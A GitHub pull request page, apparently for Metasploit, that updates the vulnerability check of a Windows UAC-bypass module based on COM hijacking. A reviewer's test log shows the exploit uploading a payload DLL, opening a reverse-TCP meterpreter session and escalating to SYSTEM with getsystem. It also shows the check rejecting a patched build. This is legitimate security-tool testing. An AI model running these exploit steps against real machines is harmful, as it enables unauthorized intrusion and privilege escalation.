-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Update check comhijack #16268
Update check comhijack #16268
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
LGTM. I tested that it still works on WIndows 10 v1803, but properly identifies that v21H2 is not vulnerable. Thanks for the patch @bwatters-r7 !
Testing Output
Windows 10 x64 v1803
msf6 exploit(windows/local/bypassuac_comhijack) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/local/bypassuac_comhijack) >
msf6 exploit(windows/local/bypassuac_comhijack) > show options
Module options (exploit/windows/local/bypassuac_comhijack):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION -1 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/local/bypassuac_comhijack) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) > exploit
[-] Handler failed to bind to 192.168.159.128:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\SMCINT~1\AppData\Local\Temp\GKelnqRg.dll ...
[*] Executing high integrity process C:\Windows\System32\mmc.exe
[*] Sending stage (200262 bytes) to 192.168.159.91
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.91:51936 ) at 2022-03-04 09:47:51 -0500
[*] Cleaning up registry; this can take some time...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://192.168.159.128:4444
msf6 exploit(windows/local/bypassuac_comhijack) > check
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > check VERBOSE=true
[*] System OS Detected: Windows 10 (10.0 Build 17134).
[*] Detected build number: 17134
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > sessions -i -1
[*] Starting interaction with 2...
meterpreter > getuid
Server username: DESKTOP-2OL4COJ\smcintyre
meterpreter > sysinfo
Computer : DESKTOP-2OL4COJ
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
Windows 10 x64 v21H2
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 3...
meterpreter > getuid
Server username: DESKTOP-SRAQBLH\smcintyre
meterpreter > sysinfo
Computer : DESKTOP-SRAQBLH
OS : Windows 10 (10.0 Build 19044).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 3...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > previous
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) > run
[-] Handler failed to bind to 192.168.159.128:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > check
[*] The target is not exploitable.
msf6 exploit(windows/local/bypassuac_comhijack) >
Release NotesThis updates the check method of the |
Fixes #16216
This improves the check method for
exploit/windows/local/bypassuac_comhijack
by verifying build numbers for windows 10 and 2016+ server editions. It also adds the autocheck changes and includes a rubocop cleanup.Testing
use exploit/windows/local/bypassuac_comhijack
set session <session>
Windows 7
Windows 10 v1809
Windows Server 2019
Windows 10x64 1909